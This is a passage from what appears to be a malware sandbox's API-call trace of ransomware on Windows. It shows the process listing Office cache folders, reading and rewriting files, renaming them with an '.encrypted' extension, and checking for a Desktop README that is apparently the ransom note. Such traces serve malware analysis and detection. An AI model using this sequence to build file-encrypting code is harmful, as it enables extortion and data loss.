users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.encrypted")) returned 1 [0237.112] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2ee1ec, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0237.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6e0) returned 1 [0237.112] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0237.113] GetFileType (hFile=0x280) returned 0x1 [0237.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6dc) returned 1 [0237.113] GetFileType (hFile=0x280) returned 0x1 [0237.113] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee7e8 | out: lpFileSizeHigh=0x2ee7e8*=0x0) returned 0x91975 [0237.116] ReadFile (in: hFile=0x280, lpBuffer=0x32054d0, nNumberOfBytesToRead=0x91975, lpNumberOfBytesRead=0x2ee794, lpOverlapped=0x0 | out: lpBuffer=0x32054d0*, lpNumberOfBytesRead=0x2ee794*=0x91975, lpOverlapped=0x0) returned 1 [0237.127] CloseHandle (hObject=0x280) returned 1 [0237.202] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0237.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee760) returned 1 [0237.202] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee7dc | out: lpFileInformation=0x2ee7dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee75c) returned 1 [0237.202] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2ee1d4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0237.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6c8) returned 1 [0237.202] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0237.208] GetFileType (hFile=0x280) returned 0x1 [0237.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6c4) returned 1 [0237.208] GetFileType (hFile=0x280) returned 0x1 [0237.209] WriteFile (in: hFile=0x280, lpBuffer=0x34dd488*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x2ee784, lpOverlapped=0x0 | out: lpBuffer=0x34dd488*, lpNumberOfBytesWritten=0x2ee784*=0x91980, lpOverlapped=0x0) returned 1 [0237.218] CloseHandle (hObject=0x280) returned 1 [0237.218] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0237.218] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.encrypted", lpFilePart=0x0) returned 0x62 [0237.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee76c) returned 1 [0237.219] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee7e8 | out: lpFileInformation=0x2ee7e8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0x72eedd20, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x91980)) returned 1 [0237.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee768) returned 1 [0237.219] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.encrypted")) returned 1 [0237.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0237.220] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0237.220] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0237.220] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f5fa8 [0237.230] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.231] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34ae1a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x34ae1a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe0c2860, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0237.231] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x940c2a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x940c2a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0237.231] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf885a000, ftCreationTime.dwHighDateTime=0x1cac4d7, ftLastAccessTime.dwLowDateTime=0xf885a000, ftLastAccessTime.dwHighDateTime=0x1cac4d7, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0x0, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0237.231] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd900f00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbd900f00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x16854390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0x0, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0237.231] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x147e5b00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x147e5b00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xff654fc0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0237.231] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3a02e00, ftCreationTime.dwHighDateTime=0x1cac5f7, ftLastAccessTime.dwLowDateTime=0xe3a02e00, ftLastAccessTime.dwHighDateTime=0x1cac5f7, ftLastWriteTime.dwLowDateTime=0x17e0dbf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0x0, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0237.231] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe06a9500, ftCreationTime.dwHighDateTime=0x1cac7e5, ftLastAccessTime.dwLowDateTime=0xe06a9500, ftLastAccessTime.dwHighDateTime=0x1cac7e5, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0237.231] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbb2e2000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbb2e2000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x1a41c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPlusrWW.msi", cAlternateFileName="PROPLU~1.MSI")) returned 1 [0237.232] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x41d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPlusrWW.xml", cAlternateFileName="PROPLU~1.XML")) returned 1 [0237.232] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x262b2700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x262b2700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x1ffd0c0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xa97cbdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPrWW.cab", cAlternateFileName="")) returned 1 [0237.232] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf14900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbf14900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xc96ff40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xd49ee31, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPrWW2.cab", cAlternateFileName="")) returned 1 [0237.232] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec13c00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbec13c00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x1682d290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0237.232] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0237.232] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0237.232] FindClose (in: hFindFile=0x94f5fa8 | out: hFindFile=0x94f5fa8) returned 1 [0237.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0237.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0237.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0237.233] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0237.233] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0237.233] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f5fa8 [0237.234] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.234] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34ae1a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x34ae1a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe0c2860, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0237.235] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x940c2a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x940c2a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0237.235] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf885a000, ftCreationTime.dwHighDateTime=0x1cac4d7, ftLastAccessTime.dwLowDateTime=0xf885a000, ftLastAccessTime.dwHighDateTime=0x1cac4d7, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0x0, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0237.235] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd900f00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbd900f00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x16854390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0x0, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0237.235] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x147e5b00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x147e5b00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xff654fc0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0237.235] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3a02e00, ftCreationTime.dwHighDateTime=0x1cac5f7, ftLastAccessTime.dwLowDateTime=0xe3a02e00, ftLastAccessTime.dwHighDateTime=0x1cac5f7, ftLastWriteTime.dwLowDateTime=0x17e0dbf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0x0, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0237.235] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe06a9500, ftCreationTime.dwHighDateTime=0x1cac7e5, ftLastAccessTime.dwLowDateTime=0xe06a9500, ftLastAccessTime.dwHighDateTime=0x1cac7e5, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0237.236] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbb2e2000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbb2e2000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x1a41c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPlusrWW.msi", cAlternateFileName="PROPLU~1.MSI")) returned 1 [0237.236] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x41d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPlusrWW.xml", cAlternateFileName="PROPLU~1.XML")) returned 1 [0237.236] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x262b2700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x262b2700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x1ffd0c0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xa97cbdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPrWW.cab", cAlternateFileName="")) returned 1 [0237.236] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf14900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbf14900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xc96ff40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xd49ee31, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPrWW2.cab", cAlternateFileName="")) returned 1 [0237.236] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec13c00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbec13c00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x1682d290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0237.237] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0237.237] FindNextFileW (in: hFindFile=0x94f5fa8, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0237.237] FindClose (in: hFindFile=0x94f5fa8 | out: hFindFile=0x94f5fa8) returned 1 [0237.238] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0237.238] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0237.238] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All 